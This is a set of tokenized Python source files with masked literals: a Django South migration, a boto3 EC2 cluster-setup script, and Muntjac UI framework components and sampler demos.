'<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:location>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> 
'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:image>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:key>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import DataMigration <EOL> from django . db import models <EOL> from authority . models import Permission <EOL> class Migration ( DataMigration ) : <EOL> def forwards ( self , orm ) : <EOL> """<STR_LIT>""" <EOL> Permission . objects . filter ( codename = "<STR_LIT>" <EOL> ) . update ( codename = "<STR_LIT>" ) <EOL> def backwards ( self , orm ) : <EOL> """<STR_LIT>""" <EOL> Permission . objects . filter ( codename = "<STR_LIT>" <EOL> ) . update ( codename = "<STR_LIT>" ) <EOL> models = { } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> import boto3 , os , argparse , sys <EOL> sys . path . append ( "<STR_LIT:..>" ) <EOL> from botocore . exceptions import ClientError as BotoClientError <EOL> from time import sleep <EOL> from create_clusters import get_tag , keyfile <EOL> from config_utils import quiet_wrap <EOL> my_instances_filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ get_tag ( '<STR_LIT>' ) ] } ] <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) <EOL> args = parser . parse_args ( ) <EOL> ec2 = boto3 . resource ( '<STR_LIT>' ) <EOL> hosts = [ ] <EOL> private_ips = [ ] <EOL> reservations = ec2 . instances . filter ( Filters = my_instances_filters ) <EOL> for instance in reservations : <EOL> print ( "<STR_LIT>" . format ( instance . instance_id , instance . public_ip_address ) ) <EOL> hosts . append ( instance . public_ip_address ) <EOL> private_ips . append ( instance . private_ip_address ) <EOL> if len ( hosts ) != len ( private_ips ) : <EOL> raise ( RuntimeError ( "<STR_LIT>" ) ) <EOL> if len ( hosts ) == <NUM_LIT:0> : <EOL> raise ( RuntimeError ( "<STR_LIT>" ) ) <EOL> print ( "<STR_LIT>" ) <EOL> zooid = <NUM_LIT:1> <EOL> for h in hosts : <EOL> cmd_str = [ ] <EOL> with open ( "<STR_LIT>" , "<STR_LIT:w>" ) as tmpfile : <EOL> with open ( "<STR_LIT>" , "<STR_LIT:r>" ) as f : <EOL> for l in f : <EOL> tmpfile . write ( l ) <EOL> host_strings = [ "<STR_LIT>" . format ( i + <NUM_LIT:1> , private_ips [ i ] ) for i in range ( len ( hosts ) ) ] <EOL> for s in host_strings : <EOL> tmpfile . write ( s + "<STR_LIT:\n>" ) <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , tmpfile . name , h ) ) <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , h ) ) <EOL> cmd_str . append ( "<STR_LIT>" . 
format ( keyfile , h , zooid ) ) <EOL> zooid += <NUM_LIT:1> <EOL> for cmd in cmd_str : <EOL> print ( cmd ) <EOL> res = os . system ( cmd ) <EOL> if res != <NUM_LIT:0> : <EOL> raise ( RuntimeError ( "<STR_LIT>" . format ( cmd , res ) ) ) <EOL> cmd_str = [ "<STR_LIT>" . format ( keyfile , h ) for h in hosts ] <EOL> for cmd in cmd_str : <EOL> print ( cmd ) <EOL> res = os . system ( cmd ) <EOL> if res != <NUM_LIT:0> : <EOL> raise ( RuntimeError ( "<STR_LIT>" . format ( cmd , res ) ) ) <EOL> print ( "<STR_LIT>" ) <EOL> for h in hosts : <EOL> cmd_str = [ ] <EOL> with open ( "<STR_LIT>" , "<STR_LIT:w>" ) as tmpfile : <EOL> with open ( "<STR_LIT>" , "<STR_LIT:r>" ) as f : <EOL> for l in f : <EOL> tmpfile . write ( l ) <EOL> tmpfile . write ( "<STR_LIT>" ) <EOL> host_strings = [ "<STR_LIT>" . format ( private_ips [ i ] ) for i in range ( len ( hosts ) ) ] <EOL> for v in host_strings : <EOL> tmpfile . write ( v ) <EOL> tmpfile . write ( "<STR_LIT>" . format ( private_ips [ <NUM_LIT:0> ] ) ) <EOL> tmpfile . write ( "<STR_LIT>" ) <EOL> tmpfile . write ( "<STR_LIT>" ) <EOL> tmpfile . write ( "<STR_LIT>" . join ( [ "<STR_LIT>" . format ( [ <NUM_LIT> + i for i in range ( len ( hosts ) ) ] ) ] ) ) <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , tmpfile . name , h ) ) <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , h ) ) <EOL> if h == hosts [ <NUM_LIT:0> ] : <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , h , quiet_wrap ( "<STR_LIT>" ) ) ) <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , h , quiet_wrap ( "<STR_LIT>" ) ) ) <EOL> else : <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , h , quiet_wrap ( "<STR_LIT>" ) ) ) <EOL> for cmd in cmd_str : <EOL> print ( cmd ) <EOL> res = os . system ( cmd ) <EOL> if res != <NUM_LIT:0> : <EOL> raise ( RuntimeError ( "<STR_LIT>" . format ( cmd , res ) ) ) <EOL> print ( "<STR_LIT>" . format ( hosts [ <NUM_LIT:0> ] ) ) <EOL> print ( "<STR_LIT:\n>" . 
join ( [ "<STR_LIT>" + h for h in hosts [ <NUM_LIT:1> : ] ] ) ) <EOL> if args . elasticsearch == True : <EOL> cmd_str = [ ] <EOL> for h in hosts : <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , "<STR_LIT>" , h ) ) <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , h ) ) <EOL> for cmd in cmd_str : <EOL> print ( cmd ) <EOL> res = os . system ( cmd ) <EOL> if res != <NUM_LIT:0> : <EOL> raise ( RuntimeError ( "<STR_LIT>" . format ( cmd , res ) ) ) <EOL> print ( "<STR_LIT>" ) <EOL> with open ( "<STR_LIT>" , "<STR_LIT:w>" ) as tmpfile : <EOL> with open ( "<STR_LIT>" , "<STR_LIT:r>" ) as f : <EOL> for l in f : <EOL> tmpfile . write ( l ) <EOL> S = boto3 . _get_default_session ( ) <EOL> profile = S . _session . full_config [ '<STR_LIT>' ] [ '<STR_LIT:default>' ] <EOL> tmpfile . write ( "<STR_LIT>" . format ( profile [ '<STR_LIT>' ] ) ) <EOL> tmpfile . write ( "<STR_LIT>" . format ( profile [ '<STR_LIT>' ] ) ) <EOL> tmpfile . write ( "<STR_LIT>" . format ( profile [ '<STR_LIT>' ] ) ) <EOL> tmpfile . write ( "<STR_LIT>" ) <EOL> tmpfile . write ( "<STR_LIT>" . format ( get_tag ( '<STR_LIT>' ) ) ) <EOL> tmpfile . write ( "<STR_LIT>" . format ( get_tag ( '<STR_LIT>' ) ) ) <EOL> cmd_str = [ ] <EOL> for h in hosts : <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , tmpfile . name , h ) ) <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , h ) ) <EOL> cmd_str . extend ( [ "<STR_LIT>" . format ( keyfile , h ) for h in hosts ] ) <EOL> for cmd in cmd_str : <EOL> print ( cmd ) <EOL> res = os . system ( cmd ) <EOL> if res != <NUM_LIT:0> : <EOL> raise ( RuntimeError ( "<STR_LIT>" . format ( cmd , res ) ) ) </s>
<s> from collections import deque <EOL> from muntjac . addon . colorpicker . color import Color <EOL> from muntjac . ui . custom_component import CustomComponent <EOL> from muntjac . addon . colorpicker . color_picker_grid import ColorPickerGrid <EOL> from muntjac . addon . colorpicker . color_change_event import ColorChangeEvent <EOL> from muntjac . addon . colorpicker . color_picker import IColorChangeListener <EOL> from muntjac . addon . colorpicker . color_selector import IColorSelector <EOL> _COLOR_CHANGE_METHOD = getattr ( IColorChangeListener , '<STR_LIT>' ) <EOL> class ColorPickerHistory ( CustomComponent , IColorSelector , <EOL> IColorChangeListener ) : <EOL> """<STR_LIT>""" <EOL> _STYLENAME = '<STR_LIT>' <EOL> _rows = <NUM_LIT:4> <EOL> _columns = <NUM_LIT:15> <EOL> _colorHistory = deque ( ) <EOL> _grid = None <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ColorPickerHistory , self ) . __init__ ( ) <EOL> self . removeStyleName ( '<STR_LIT>' ) <EOL> self . setStyleName ( self . _STYLENAME ) <EOL> self . _grid = ColorPickerGrid ( self . _rows , self . _columns ) <EOL> self . _grid . setWidth ( '<STR_LIT>' ) <EOL> self . _grid . setPosition ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . _grid . addListener ( self , IColorChangeListener ) <EOL> self . setCompositionRoot ( self . _grid ) <EOL> def setHeight ( self , height , unit = None ) : <EOL> super ( ColorPickerHistory , self ) . setHeight ( height , unit ) <EOL> self . _grid . setHeight ( height , unit ) <EOL> def setColor ( self , color ) : <EOL> exists = False <EOL> for c in self . _colorHistory : <EOL> if color == c : <EOL> exists = True <EOL> break <EOL> if not exists : <EOL> self . _colorHistory . append ( color ) <EOL> colorList = list ( self . _colorHistory ) <EOL> colorList . reverse ( ) <EOL> colorList . insert ( <NUM_LIT:0> , colorList . pop ( colorList . index ( color ) ) ) <EOL> colors = [ ( [ None ] * self . _columns ) for _ in range ( self . 
_rows ) ] <EOL> iterator = iter ( colorList ) <EOL> for row in range ( self . _rows ) : <EOL> for col in range ( self . _columns ) : <EOL> try : <EOL> colors [ row ] [ col ] = iterator . next ( ) <EOL> except StopIteration : <EOL> colors [ row ] [ col ] = Color . WHITE <EOL> self . _grid . setColorGrid ( colors ) <EOL> self . _grid . requestRepaint ( ) <EOL> def getColor ( self ) : <EOL> return self . _colorHistory [ <NUM_LIT:0> ] <EOL> def getHistory ( self ) : <EOL> """<STR_LIT>""" <EOL> array = list ( self . _colorHistory ) <EOL> return array <EOL> def hasColor ( self , c ) : <EOL> """<STR_LIT>""" <EOL> return c in self . _colorHistory <EOL> def addListener ( self , listener , iface = None ) : <EOL> """<STR_LIT>""" <EOL> if ( isinstance ( listener , IColorChangeListener ) and <EOL> ( iface is None or issubclass ( iface , IColorChangeListener ) ) ) : <EOL> self . registerListener ( ColorChangeEvent , listener , <EOL> _COLOR_CHANGE_METHOD ) <EOL> super ( ColorPickerHistory , self ) . addListener ( listener , iface ) <EOL> def addCallback ( self , callback , eventType = None , * args ) : <EOL> if eventType is None : <EOL> eventType = callback . _eventType <EOL> if issubclass ( eventType , ColorChangeEvent ) : <EOL> self . registerCallback ( ColorChangeEvent , callback , None , * args ) <EOL> else : <EOL> super ( ColorPickerHistory , self ) . addCallback ( callback , eventType , <EOL> * args ) <EOL> def removeListener ( self , listener , iface = None ) : <EOL> """<STR_LIT>""" <EOL> if ( isinstance ( listener , IColorChangeListener ) and <EOL> ( iface is None or issubclass ( iface , IColorChangeListener ) ) ) : <EOL> self . withdrawListener ( ColorChangeEvent , listener ) <EOL> super ( ColorPickerHistory , self ) . removeListener ( listener , iface ) <EOL> def removeCallback ( self , callback , eventType = None ) : <EOL> if eventType is None : <EOL> eventType = callback . _eventType <EOL> if issubclass ( eventType , ColorChangeEvent ) : <EOL> self . 
withdrawCallback ( ColorChangeEvent , callback ) <EOL> else : <EOL> super ( ColorPickerHistory , self ) . removeCallback ( callback , eventType ) <EOL> def colorChanged ( self , event ) : <EOL> self . fireEvent ( ColorChangeEvent ( self , event . getColor ( ) ) ) </s>
<s> from muntjac . ui . abstract_component import AbstractComponent <EOL> from muntjac . addon . refresher . ui . v_refresher import VRefresher <EOL> class Refresher ( AbstractComponent ) : <EOL> """<STR_LIT>""" <EOL> CLIENT_WIDGET = None <EOL> TYPE_MAPPING = '<STR_LIT>' <EOL> _DEFAULT_REFRESH_INTERVAL = <NUM_LIT:1000> <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( Refresher , self ) . __init__ ( ) <EOL> self . _refreshListeners = list ( ) <EOL> self . _refreshIntervalInMillis = self . _DEFAULT_REFRESH_INTERVAL <EOL> def paintContent ( self , target ) : <EOL> target . addAttribute ( '<STR_LIT>' , self . _refreshIntervalInMillis ) <EOL> def setRefreshInterval ( self , intervalInMillis ) : <EOL> """<STR_LIT>""" <EOL> self . _refreshIntervalInMillis = intervalInMillis <EOL> self . requestRepaint ( ) <EOL> def getRefreshInterval ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _refreshIntervalInMillis <EOL> def changeVariables ( self , source , variables ) : <EOL> super ( Refresher , self ) . changeVariables ( source , variables ) <EOL> if VRefresher . VARIABLE_REFRESH_EVENT in variables : <EOL> self . fireRefreshEvents ( ) <EOL> def fireRefreshEvents ( self ) : <EOL> for listener in self . _refreshListeners : <EOL> listener . refresh ( self ) <EOL> def addListener ( self , listener , iface = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( listener , RefreshListener ) : <EOL> self . _refreshListeners . append ( listener ) <EOL> else : <EOL> super ( Refresher , self ) . addListener ( listener , iface ) <EOL> def removeListener ( self , listener , iface = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( listener , RefreshListener ) : <EOL> self . _refreshListeners . remove ( listener ) <EOL> else : <EOL> super ( Refresher , self ) . removeListener ( listener , iface ) <EOL> class RefreshListener ( object ) : <EOL> def refresh ( self , source ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> class ListSet ( list ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args ) : <EOL> self . _itemSet = None <EOL> self . _duplicates = dict ( ) <EOL> nargs = len ( args ) <EOL> if nargs == <NUM_LIT:0> : <EOL> super ( ListSet , self ) . __init__ ( ) <EOL> self . _itemSet = set ( ) <EOL> elif nargs == <NUM_LIT:1> : <EOL> if isinstance ( args [ <NUM_LIT:0> ] , int ) : <EOL> initialCapacity , = args <EOL> super ( ListSet , self ) . __init__ ( ) <EOL> self . _itemSet = set ( ) <EOL> else : <EOL> c , = args <EOL> super ( ListSet , self ) . __init__ ( c ) <EOL> self . _itemSet = set ( ) <EOL> self . _itemSet = self . _itemSet . union ( c ) <EOL> else : <EOL> raise ValueError , '<STR_LIT>' <EOL> def contains ( self , o ) : <EOL> return o in self . _itemSet <EOL> def __contains__ ( self , item ) : <EOL> return self . contains ( item ) <EOL> def containsAll ( self , c ) : <EOL> for cc in c : <EOL> if cc not in self . _itemSet : <EOL> return False <EOL> else : <EOL> return True <EOL> def append ( self , val ) : <EOL> return self . add ( val ) <EOL> def insert ( self , idx , val ) : <EOL> return self . add ( idx , val ) <EOL> def add ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> nargs = len ( args ) <EOL> if nargs == <NUM_LIT:1> : <EOL> e , = args <EOL> if self . contains ( e ) : <EOL> return False <EOL> if not super ( ListSet , self ) . __contains__ ( e ) : <EOL> super ( ListSet , self ) . append ( e ) <EOL> self . _itemSet . add ( e ) <EOL> return True <EOL> else : <EOL> return False <EOL> elif nargs == <NUM_LIT:2> : <EOL> index , element = args <EOL> if self . contains ( element ) : <EOL> return <EOL> super ( ListSet , self ) . insert ( index , element ) <EOL> self . _itemSet . add ( element ) <EOL> else : <EOL> raise ValueError , '<STR_LIT>' <EOL> def extend ( self , iterable ) : <EOL> return self . 
addAll ( iterable ) <EOL> def addAll ( self , * args ) : <EOL> nargs = len ( args ) <EOL> if nargs == <NUM_LIT:1> : <EOL> c , = args <EOL> modified = False <EOL> for e in c : <EOL> if self . contains ( e ) : <EOL> continue <EOL> if self . add ( e ) : <EOL> self . _itemSet . add ( e ) <EOL> modified = True <EOL> return modified <EOL> elif nargs == <NUM_LIT:2> : <EOL> index , c = args <EOL> modified = False <EOL> for e in c : <EOL> if self . contains ( e ) : <EOL> continue <EOL> self . add ( index , e ) <EOL> index += <NUM_LIT:1> <EOL> self . _itemSet . add ( e ) <EOL> modified = True <EOL> return modified <EOL> else : <EOL> raise ValueError , '<STR_LIT>' <EOL> def clear ( self ) : <EOL> del self [ : ] <EOL> self . _itemSet . clear ( ) <EOL> def index ( self , val ) : <EOL> return self . indexOf ( val ) <EOL> def indexOf ( self , o ) : <EOL> if not self . contains ( o ) : <EOL> return - <NUM_LIT:1> <EOL> return super ( ListSet , self ) . index ( o ) <EOL> def lastIndexOf ( self , o ) : <EOL> if not self . contains ( o ) : <EOL> return - <NUM_LIT:1> <EOL> return self [ : : - <NUM_LIT:1> ] . index ( o ) <EOL> def remove ( self , o ) : <EOL> if isinstance ( o , int ) : <EOL> index = o <EOL> e = super ( ListSet , self ) . pop ( index ) <EOL> if e is not None : <EOL> self . _itemSet . remove ( e ) <EOL> return e <EOL> else : <EOL> if super ( ListSet , self ) . remove ( o ) : <EOL> self . _itemSet . remove ( o ) <EOL> return True <EOL> else : <EOL> return False <EOL> def removeRange ( self , fromIndex , toIndex ) : <EOL> toRemove = set ( ) <EOL> for idx in range ( fromIndex , toIndex ) : <EOL> toRemove . add ( self [ idx ] ) <EOL> del self [ fromIndex : toIndex ] <EOL> for r in toRemove : <EOL> self . _itemSet . remove ( r ) <EOL> def set ( self , index , element ) : <EOL> if element in self : <EOL> if self [ index ] == element : <EOL> return element <EOL> else : <EOL> self . addDuplicate ( element ) <EOL> old = self [ index ] = element <EOL> self . 
removeFromSet ( old ) <EOL> self . _itemSet . add ( element ) <EOL> return old <EOL> def removeFromSet ( self , e ) : <EOL> """<STR_LIT>""" <EOL> dupl = self . _duplicates . get ( e ) <EOL> if dupl is not None : <EOL> if dupl == <NUM_LIT:1> : <EOL> del self . _duplicates [ e ] <EOL> else : <EOL> self . _duplicates [ e ] = dupl - <NUM_LIT:1> <EOL> else : <EOL> self . _itemSet . remove ( e ) <EOL> def addDuplicate ( self , element ) : <EOL> """<STR_LIT>""" <EOL> nr = self . _duplicates . get ( element ) <EOL> if nr is None : <EOL> nr = <NUM_LIT:1> <EOL> else : <EOL> nr += <NUM_LIT:1> <EOL> self . _duplicates [ element ] = nr <EOL> def clone ( self ) : <EOL> v = ListSet ( self [ : ] ) <EOL> v . _itemSet = set ( self . _itemSet ) <EOL> return v </s>
<s> import inspect <EOL> from muntjac . util import fullname <EOL> from muntjac . util import loadClass <EOL> from muntjac . terminal . gwt . server . abstract_application_servlet import AbstractApplicationServlet <EOL> class Feature ( object ) : <EOL> """<STR_LIT>""" <EOL> PROPERTY_ICON = '<STR_LIT>' <EOL> PROPERTY_NAME = '<STR_LIT:Name>' <EOL> PROPERTY_DESCRIPTION = '<STR_LIT>' <EOL> _MSG_SOURCE_NOT_AVAILABLE = ( '<STR_LIT>' <EOL> + '<STR_LIT>' <EOL> + '<STR_LIT>' <EOL> + '<STR_LIT>' ) <EOL> _MUTEX = object ( ) <EOL> def __init__ ( self ) : <EOL> self . _pythonSource = None <EOL> def getName ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getDescription ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getRelatedResources ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getRelatedAPI ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getRelatedFeatures ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def getIconName ( self ) : <EOL> """<STR_LIT>""" <EOL> icon = self . __class__ . __name__ + '<STR_LIT>' <EOL> return icon <EOL> def getExample ( self ) : <EOL> """<STR_LIT>""" <EOL> pkgName , className = fullname ( self ) . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> canonicalName = pkgName + '<STR_LIT>' + '<STR_LIT:.>' + className + '<STR_LIT>' <EOL> classObject = loadClass ( canonicalName ) <EOL> return classObject ( ) <EOL> def getSource ( self ) : <EOL> if self . _pythonSource is None : <EOL> try : <EOL> ex = self . getExample ( ) <EOL> self . _pythonSource = inspect . getsource ( inspect . getmodule ( ex ) ) <EOL> except IOError : <EOL> print ( self . _MSG_SOURCE_NOT_AVAILABLE <EOL> + '<STR_LIT>' + self . getFragmentName ( ) + '<STR_LIT:)>' ) <EOL> self . _pythonSource = self . _MSG_SOURCE_NOT_AVAILABLE <EOL> return self . _pythonSource <EOL> def getSourceHTML ( self ) : <EOL> return self . 
getSource ( ) <EOL> def getFragmentName ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __class__ . __name__ <EOL> def getSinceVersion ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> @ classmethod <EOL> def getThemeBase ( cls ) : <EOL> """<STR_LIT>""" <EOL> from muntjac . demo . sampler . SamplerApplication import SamplerApplication <EOL> return SamplerApplication . getThemeBase ( ) <EOL> def __str__ ( self ) : <EOL> return self . getName ( ) <EOL> def __eq__ ( self , obj ) : <EOL> if obj is None : <EOL> return False <EOL> return obj . __class__ == self . __class__ <EOL> def hashCode ( self ) : <EOL> return hash ( self . __class__ ) <EOL> def __hash__ ( self ) : <EOL> return self . hashCode ( ) <EOL> class Version ( object ) : <EOL> OLD = None <EOL> BUILD = None <EOL> V62 = None <EOL> V63 = None <EOL> V64 = None <EOL> V65 = None <EOL> V66 = None <EOL> def __init__ ( self , version ) : <EOL> self . version = version <EOL> def isNew ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . BUILD . version <= self . version <EOL> _enum_values = [ OLD , BUILD , V62 , V63 , V64 , V65 , V66 ] <EOL> @ classmethod <EOL> def values ( cls ) : <EOL> return cls . _enum_values [ : ] <EOL> Version . OLD = Version ( <NUM_LIT:0> ) <EOL> Version . BUILD = Version ( int ( '<STR_LIT>' % ( AbstractApplicationServlet . VERSION_MAJOR , <EOL> AbstractApplicationServlet . VERSION_MINOR ) ) ) <EOL> Version . V62 = Version ( <NUM_LIT> ) <EOL> Version . V63 = Version ( <NUM_LIT> ) <EOL> Version . V64 = Version ( <NUM_LIT:64> ) <EOL> Version . V65 = Version ( <NUM_LIT> ) <EOL> Version . V66 = Version ( <NUM_LIT> ) </s>
<s> import time <EOL> import threading <EOL> from time import gmtime , strftime <EOL> from muntjac . api import Button , VerticalLayout , Label , TextArea <EOL> from muntjac . terminal . theme_resource import ThemeResource <EOL> from muntjac . ui . button import IClickListener <EOL> class JSApiExample ( VerticalLayout ) : <EOL> def __init__ ( self ) : <EOL> super ( JSApiExample , self ) . __init__ ( ) <EOL> self . _toBeUpdatedFromThread = None <EOL> self . _startThread = None <EOL> self . _running = Label ( '<STR_LIT>' ) <EOL> self . setSpacing ( True ) <EOL> javascript = Label ( "<STR_LIT>" , <EOL> Label . CONTENT_XHTML ) <EOL> self . addComponent ( javascript ) <EOL> script = TextArea ( ) <EOL> script . setWidth ( '<STR_LIT>' ) <EOL> script . setRows ( <NUM_LIT:3> ) <EOL> script . setValue ( '<STR_LIT>' ) <EOL> self . addComponent ( script ) <EOL> self . addComponent ( Button ( '<STR_LIT>' , RunListener ( self , script ) ) ) <EOL> class RunListener ( IClickListener ) : <EOL> def __init__ ( self , component , script ) : <EOL> self . _component = component <EOL> self . _script = script <EOL> def buttonClick ( self , event ) : <EOL> self . _component . getWindow ( ) . executeJavaScript ( <EOL> str ( self . _script . getValue ( ) ) ) <EOL> class StartListener ( IClickListener ) : <EOL> def __init__ ( self , component ) : <EOL> self . _component = component <EOL> def buttonClick ( self , event ) : <EOL> self . _component . _startThread . getParent ( ) . replaceComponent ( <EOL> self . _component . _startThread , <EOL> self . _component . _running ) <EOL> BackgroundProcess ( self . _component ) . start ( ) <EOL> class BackgroundProcess ( threading . Thread ) : <EOL> def __init__ ( self , component ) : <EOL> super ( BackgroundProcess , self ) . __init__ ( ) <EOL> self . _component = component <EOL> def run ( self ) : <EOL> try : <EOL> i = <NUM_LIT:0> <EOL> while i < <NUM_LIT:10> : <EOL> time . sleep ( <NUM_LIT:1000> ) <EOL> self . _component . _toBeUpdatedFromThread . 
setValue ( <EOL> '<STR_LIT>' <EOL> + strftime ( "<STR_LIT>" , gmtime ( ) ) <EOL> + '<STR_LIT>' ) <EOL> i += <NUM_LIT:1> <EOL> self . _component . _toBeUpdatedFromThread . setValue ( <EOL> '<STR_LIT>' ) <EOL> self . _component . _running . getParent ( ) . replaceComponent ( <EOL> self . _component . _running , self . _component . _startThread ) <EOL> except self . InterruptedException , e : <EOL> e . printStackTrace ( ) </s>
<s> from muntjac . demo . sampler . features . dragndrop . DragDropHtml5FromDesktop import DragDropHtml5FromDesktop <EOL> from muntjac . demo . sampler . features . dragndrop . DragDropTableTree import DragDropTableTree <EOL> from muntjac . demo . sampler . features . dragndrop . DragDropServerValidation import DragDropServerValidation <EOL> from muntjac . ui . tree import Tree <EOL> from muntjac . event . dd . drop_handler import IDropHandler <EOL> from muntjac . demo . sampler . features . dragndrop . DragDropRearrangeComponents import DragDropRearrangeComponents <EOL> from muntjac . demo . sampler . APIResource import APIResource <EOL> from muntjac . demo . sampler . Feature import Feature , Version <EOL> class DragDropTreeSorting ( Feature ) : <EOL> def getSinceVersion ( self ) : <EOL> return Version . V63 <EOL> def getName ( self ) : <EOL> return '<STR_LIT>' <EOL> def getDescription ( self ) : <EOL> return ( '<STR_LIT>' <EOL> '<STR_LIT>' 